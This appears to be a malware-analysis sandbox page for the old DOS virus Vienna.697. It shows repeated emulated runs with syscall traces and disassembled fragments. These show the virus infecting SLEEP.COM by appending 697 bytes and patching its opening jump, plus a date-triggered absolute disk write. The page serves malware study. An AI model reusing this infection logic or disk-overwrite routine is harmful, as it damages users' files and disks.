Sample viewer

vx.netlux.org/Virus.DOS.Vienna.697

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:55:12.474615144Z 48 PC: 12a6b | Get DOS version
2018-12-17T22:55:12.47614497Z 47 PC: 12a77 | Get disk transfer address
2018-12-17T22:55:12.477259016Z 26 PC: 12a8a | Set disk transfer address
2018-12-17T22:55:12.478245523Z 42 PC: 12a9a | Get date 0x12a9a: cmp dh, 6
0x12a9d: jge 0x12aa2
0x12a9f: jmp 0x12ac1
0x12aa1: nop
0x12aa2: mov ah, 0x2a
0x12aa4: int 0x21
0x12aa6: cmp dl, 0x16
0x12aa9: jge 0x12aae
0x12aab: jmp 0x12ac1
0x12aad: nop
0x12aae: mov al, 1
0x12ab0: mov cx, 1
0x12ab3: mov dx, 0
0x12ab6: mov ds, word ptr [di + 0x37]
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si
0x12ac2: push si
2018-12-17T22:55:12.481168577Z 42 PC: 12aa6 | Get date 0x12aa6: cmp dl, 0x16
0x12aa9: jge 0x12aae
0x12aab: jmp 0x12ac1
0x12aad: nop
0x12aae: mov al, 1
0x12ab0: mov cx, 1
0x12ab3: mov dx, 0
0x12ab6: mov ds, word ptr [di + 0x37]
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si
0x12ac2: push si
0x12ac3: add si, 0x34
0x12ac7: lodsb al, byte ptr [si]
0x12ac8: mov cx, 0x8000
0x12acb: repne scasb al, byte ptr es:[di]
0x12acd: mov cx, 4
0x12ad0: lodsb al, byte ptr [si]
2018-12-17T22:55:12.483411288Z 78 PC: 12b44 | Find first file
2018-12-17T22:55:12.489286631Z 67 PC: 12b82 | Get or set file attributes
2018-12-17T22:55:12.494709191Z 67 PC: 12b94 | Get or set file attributes
2018-12-17T22:55:12.60035754Z 61 PC: 12b9f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:55:12.607309944Z 87 PC: 12bab | Get or set file date and time
2018-12-17T22:55:12.608633691Z 44 PC: 12bb7 | Get time 0x12bb7: and dh, 7
0x12bba: jmp 0x12bbd
0x12bbc: nop
0x12bbd: mov ah, 0x3f
0x12bbf: mov cx, 3
0x12bc2: mov dx, 0x24
0x12bc5: nop
0x12bc6: add dx, si
0x12bc8: int 0x21
0x12bca: jb 0x12c21
0x12bcc: cmp ax, 3
0x12bcf: jne 0x12c21
0x12bd1: mov ax, 0x4202
0x12bd4: mov cx, 0
0x12bd7: mov dx, 0
0x12bda: int 0x21
0x12bdc: jb 0x12c21
0x12bde: mov cx, ax
0x12be0: sub ax, 3
0x12be3: mov word ptr [si + 0x28], ax
2018-12-17T22:55:12.612375063Z 63 PC: 12bca | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:12.618732976Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:55:12.620054078Z 64 PC: 12c00 | Write file or device (Write 697 bytes on handle 5)
2018-12-17T22:55:12.629918551Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:55:12.631663919Z 64 PC: 12c21 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:12.638025885Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:55:12.640019676Z 62 PC: 12c38 | Close file
2018-12-17T22:55:12.647304414Z 67 PC: 12c47 | Get or set file attributes
2018-12-17T22:55:12.656828123Z 26 PC: 12c54 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11813,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.280565605Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:31:23.283524713Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:31:23.286003783Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:31:23.287687571Z 42 PC: 12a9a | Get date 0x12a9a: cmp dh, 6
0x12a9d: jge 0x12aa2
0x12a9f: jmp 0x12ac1
0x12aa1: nop
0x12aa2: mov ah, 0x2a
0x12aa4: int 0x21
0x12aa6: cmp dl, 0x16
0x12aa9: jge 0x12aae
0x12aab: jmp 0x12ac1
0x12aad: nop
0x12aae: mov al, 1
0x12ab0: mov cx, 1
0x12ab3: mov dx, 0
0x12ab6: mov ds, word ptr [di + 0x37]
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si
0x12ac2: push si
2018-12-25T12:31:23.290118471Z 78 PC: 12b44 | Find first file
2018-12-25T12:31:23.297514357Z 67 PC: 12b82 | Get or set file attributes
2018-12-25T12:31:23.303307209Z 67 PC: 12b94 | Get or set file attributes
2018-12-25T12:31:23.322247494Z 61 PC: 12b9f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.329397932Z 87 PC: 12bab | Get or set file date and time
2018-12-25T12:31:23.331261724Z 44 PC: 12bb7 | Get time 0x12bb7: and dh, 7
0x12bba: jmp 0x12bbd
0x12bbc: nop
0x12bbd: mov ah, 0x3f
0x12bbf: mov cx, 3
0x12bc2: mov dx, 0x24
0x12bc5: nop
0x12bc6: add dx, si
0x12bc8: int 0x21
0x12bca: jb 0x12c21
0x12bcc: cmp ax, 3
0x12bcf: jne 0x12c21
0x12bd1: mov ax, 0x4202
0x12bd4: mov cx, 0
0x12bd7: mov dx, 0
0x12bda: int 0x21
0x12bdc: jb 0x12c21
0x12bde: mov cx, ax
0x12be0: sub ax, 3
0x12be3: mov word ptr [si + 0x28], ax
2018-12-25T12:31:23.333327231Z 63 PC: 12bca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:23.339349494Z 66 PC: 12bdc | Move file pointer
2018-12-25T12:31:23.342885537Z 64 PC: 12c00 | Write file or device (Write 697 bytes on handle 5)
2018-12-25T12:31:23.35403206Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:31:23.355566797Z 64 PC: 12c21 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:23.362607541Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T12:31:23.364352558Z 62 PC: 12c38 | Close file
2018-12-25T12:31:23.371908781Z 67 PC: 12c47 | Get or set file attributes
2018-12-25T12:31:23.382813709Z 26 PC: 12c54 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11813,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.26762684Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:31:23.269751672Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:31:23.271850459Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:31:23.273047546Z 42 PC: 12a9a | Get date 0x12a9a: cmp dh, 6
0x12a9d: jge 0x12aa2
0x12a9f: jmp 0x12ac1
0x12aa1: nop
0x12aa2: mov ah, 0x2a
0x12aa4: int 0x21
0x12aa6: cmp dl, 0x16
0x12aa9: jge 0x12aae
0x12aab: jmp 0x12ac1
0x12aad: nop
0x12aae: mov al, 1
0x12ab0: mov cx, 1
0x12ab3: mov dx, 0
0x12ab6: mov ds, word ptr [di + 0x37]
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si
0x12ac2: push si
2018-12-25T12:31:23.275346199Z 42 PC: 12aa6 | Get date 0x12aa6: cmp dl, 0x16
0x12aa9: jge 0x12aae
0x12aab: jmp 0x12ac1
0x12aad: nop
0x12aae: mov al, 1
0x12ab0: mov cx, 1
0x12ab3: mov dx, 0
0x12ab6: mov ds, word ptr [di + 0x37]
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si
0x12ac2: push si
0x12ac3: add si, 0x34
0x12ac7: lodsb al, byte ptr [si]
0x12ac8: mov cx, 0x8000
0x12acb: repne scasb al, byte ptr es:[di]
0x12acd: mov cx, 4
0x12ad0: lodsb al, byte ptr [si]
2018-12-25T12:31:23.278251174Z 78 PC: 12b44 | Find first file
2018-12-25T12:31:23.287026408Z 67 PC: 12b82 | Get or set file attributes
2018-12-25T12:31:23.293336648Z 67 PC: 12b94 | Get or set file attributes
2018-12-25T12:31:23.311267292Z 61 PC: 12b9f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.319877811Z 87 PC: 12bab | Get or set file date and time
2018-12-25T12:31:23.3218261Z 44 PC: 12bb7 | Get time 0x12bb7: and dh, 7
0x12bba: jmp 0x12bbd
0x12bbc: nop
0x12bbd: mov ah, 0x3f
0x12bbf: mov cx, 3
0x12bc2: mov dx, 0x24
0x12bc5: nop
0x12bc6: add dx, si
0x12bc8: int 0x21
0x12bca: jb 0x12c21
0x12bcc: cmp ax, 3
0x12bcf: jne 0x12c21
0x12bd1: mov ax, 0x4202
0x12bd4: mov cx, 0
0x12bd7: mov dx, 0
0x12bda: int 0x21
0x12bdc: jb 0x12c21
0x12bde: mov cx, ax
0x12be0: sub ax, 3
0x12be3: mov word ptr [si + 0x28], ax
2018-12-25T12:31:23.32534108Z 63 PC: 12bca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:23.332779857Z 66 PC: 12bdc | Move file pointer
2018-12-25T12:31:23.334350824Z 64 PC: 12c00 | Write file or device (Write 697 bytes on handle 5)
2018-12-25T12:31:23.344790139Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:31:23.346651292Z 64 PC: 12c21 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:23.353998029Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T12:31:23.356019207Z 62 PC: 12c38 | Close file
2018-12-25T12:31:23.365615992Z 67 PC: 12c47 | Get or set file attributes
2018-12-25T12:31:23.378703866Z 26 PC: 12c54 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11813,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.305144832Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:31:23.306965698Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:31:23.308392369Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:31:23.30974825Z 42 PC: 12a9a | Get date 0x12a9a: cmp dh, 6
0x12a9d: jge 0x12aa2
0x12a9f: jmp 0x12ac1
0x12aa1: nop
0x12aa2: mov ah, 0x2a
0x12aa4: int 0x21
0x12aa6: cmp dl, 0x16
0x12aa9: jge 0x12aae
0x12aab: jmp 0x12ac1
0x12aad: nop
0x12aae: mov al, 1
0x12ab0: mov cx, 1
0x12ab3: mov dx, 0
0x12ab6: mov ds, word ptr [di + 0x37]
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si
0x12ac2: push si
2018-12-25T12:31:23.31311675Z 78 PC: 12b44 | Find first file
2018-12-25T12:31:23.319726307Z 67 PC: 12b82 | Get or set file attributes
2018-12-25T12:31:23.325591433Z 67 PC: 12b94 | Get or set file attributes
2018-12-25T12:31:23.35537938Z 61 PC: 12b9f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.363096378Z 87 PC: 12bab | Get or set file date and time
2018-12-25T12:31:23.3646939Z 44 PC: 12bb7 | Get time 0x12bb7: and dh, 7
0x12bba: jmp 0x12bbd
0x12bbc: nop
0x12bbd: mov ah, 0x3f
0x12bbf: mov cx, 3
0x12bc2: mov dx, 0x24
0x12bc5: nop
0x12bc6: add dx, si
0x12bc8: int 0x21
0x12bca: jb 0x12c21
0x12bcc: cmp ax, 3
0x12bcf: jne 0x12c21
0x12bd1: mov ax, 0x4202
0x12bd4: mov cx, 0
0x12bd7: mov dx, 0
0x12bda: int 0x21
0x12bdc: jb 0x12c21
0x12bde: mov cx, ax
0x12be0: sub ax, 3
0x12be3: mov word ptr [si + 0x28], ax
2018-12-25T12:31:23.367493136Z 63 PC: 12bca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:23.378954994Z 66 PC: 12bdc | Move file pointer
2018-12-25T12:31:23.380719364Z 64 PC: 12c00 | Write file or device (Write 697 bytes on handle 5)
2018-12-25T12:31:23.38974658Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:31:23.392234312Z 64 PC: 12c21 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:23.399230722Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T12:31:23.40065291Z 62 PC: 12c38 | Close file
2018-12-25T12:31:23.409280753Z 67 PC: 12c47 | Get or set file attributes
2018-12-25T12:31:23.419826164Z 26 PC: 12c54 | Set disk transfer address

{"DateBased":true,"Day":22,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11813,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.38941276Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:31:23.392424611Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:31:23.394117896Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:31:23.398085163Z 42 PC: 12a9a | Get date 0x12a9a: cmp dh, 6
0x12a9d: jge 0x12aa2
0x12a9f: jmp 0x12ac1
0x12aa1: nop
0x12aa2: mov ah, 0x2a
0x12aa4: int 0x21
0x12aa6: cmp dl, 0x16
0x12aa9: jge 0x12aae
0x12aab: jmp 0x12ac1
0x12aad: nop
0x12aae: mov al, 1
0x12ab0: mov cx, 1
0x12ab3: mov dx, 0
0x12ab6: mov ds, word ptr [di + 0x37]
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si
0x12ac2: push si
2018-12-25T12:31:23.401298606Z 78 PC: 12b44 | Find first file
2018-12-25T12:31:23.409252933Z 67 PC: 12b82 | Get or set file attributes
2018-12-25T12:31:23.416131163Z 67 PC: 12b94 | Get or set file attributes
2018-12-25T12:31:23.434152589Z 61 PC: 12b9f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.442887742Z 87 PC: 12bab | Get or set file date and time
2018-12-25T12:31:23.444581795Z 44 PC: 12bb7 | Get time 0x12bb7: and dh, 7
0x12bba: jmp 0x12bbd
0x12bbc: nop
0x12bbd: mov ah, 0x3f
0x12bbf: mov cx, 3
0x12bc2: mov dx, 0x24
0x12bc5: nop
0x12bc6: add dx, si
0x12bc8: int 0x21
0x12bca: jb 0x12c21
0x12bcc: cmp ax, 3
0x12bcf: jne 0x12c21
0x12bd1: mov ax, 0x4202
0x12bd4: mov cx, 0
0x12bd7: mov dx, 0
0x12bda: int 0x21
0x12bdc: jb 0x12c21
0x12bde: mov cx, ax
0x12be0: sub ax, 3
0x12be3: mov word ptr [si + 0x28], ax
2018-12-25T12:31:23.447580971Z 63 PC: 12bca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:23.456425356Z 66 PC: 12bdc | Move file pointer
2018-12-25T12:31:23.458611586Z 64 PC: 12c00 | Write file or device (Write 697 bytes on handle 5)
2018-12-25T12:31:23.468644111Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:31:23.471856696Z 64 PC: 12c21 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:23.479718876Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T12:31:23.481400761Z 62 PC: 12c38 | Close file
2018-12-25T12:31:23.49094523Z 67 PC: 12c47 | Get or set file attributes
2018-12-25T12:31:23.503849761Z 26 PC: 12c54 | Set disk transfer address